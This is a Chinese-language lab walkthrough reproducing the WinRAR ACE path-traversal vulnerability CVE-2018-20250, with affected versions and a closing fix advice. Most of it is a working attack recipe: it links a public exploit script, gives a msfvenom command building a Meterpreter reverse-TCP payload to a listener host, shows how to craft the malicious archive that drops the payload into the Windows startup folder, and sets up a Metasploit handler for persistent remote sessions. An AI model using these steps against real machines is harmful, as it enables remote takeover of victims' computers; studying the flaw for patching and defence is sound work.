winrar远程代码执行漏洞(cve-2018-20250)

漏洞介绍

漏洞影响

漏洞复现

漏洞修复

漏洞介绍

Check Point团队爆出了一个关于WinRAR存在19年的漏洞，用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件，当受害者使用WinRAR解压该恶意文件时便会触发漏洞。

该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的，该动态链接库在 2006 年被编译，没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时，由于没有对文件名进行充分过滤，导致其可实现目录穿越，将恶意文件写入任意目录，甚至可以写入文件至开机启动项，导致代码执行

漏洞影响

WinRAR < 5.70 Beta 1
Bandizip < = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩 < = 4.0.0.1170

漏洞复现

1. 下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250

将下载文件放入到kali中

2. 利用msfvenom生成恶意exe文件

进入到下载的WinRAR exp文件夹中（CVE-2018-master），执行如下。lhost为接收反弹shell的主机

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.129 lport=1234 -f exe >./test.exe

3.编辑winrar漏洞exp文件

vim exp.py

修改evil_filename值为从../变为./

修改python3的运行命令

修改完成之后进行保存

4. 运行exp将exe程序生成恶意rar文件

5. 把恶意test.rar文件传到win7靶机

6. 下载含漏洞版本的winrar软件

这里下载的winrar5.5.0， https://dwd.jb51.net/201102/tools/WinRAR_x64_SC.exe

7. msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
run

8. winrar解压文件

执行一键解压

解压后会在自启动目录生成一个恶意文件hi.exe，我们可以运行 shell:startiup进行查看

当电脑重启后就会自动运行该文件，这里重启电脑！然后查看msf监听的是否上线

如下，成功与受害机器建立了sessions会话

msf持续监听

一般我们执行exploit 启动 handler 后，在收到sessions 后就会停止监听端口，如果你还想要继续接受弹回来的另外一台主机的会话的话，那得还要运行一次exploit 命令，这样显得有些碍手碍脚。所以这里为了能够持续地监听弹回来的主机，可以运行如下命令

sf6 exploit(multi/handler) > set ExitOnSession false #持续监听
msf6 exploit(multi/handler) > exploit -j #攻击在后台进行，一般建立起sessions后自动进入meterpreter会话，加-j参数则不进入meterpreter

漏洞修复

更新winrar到最新版本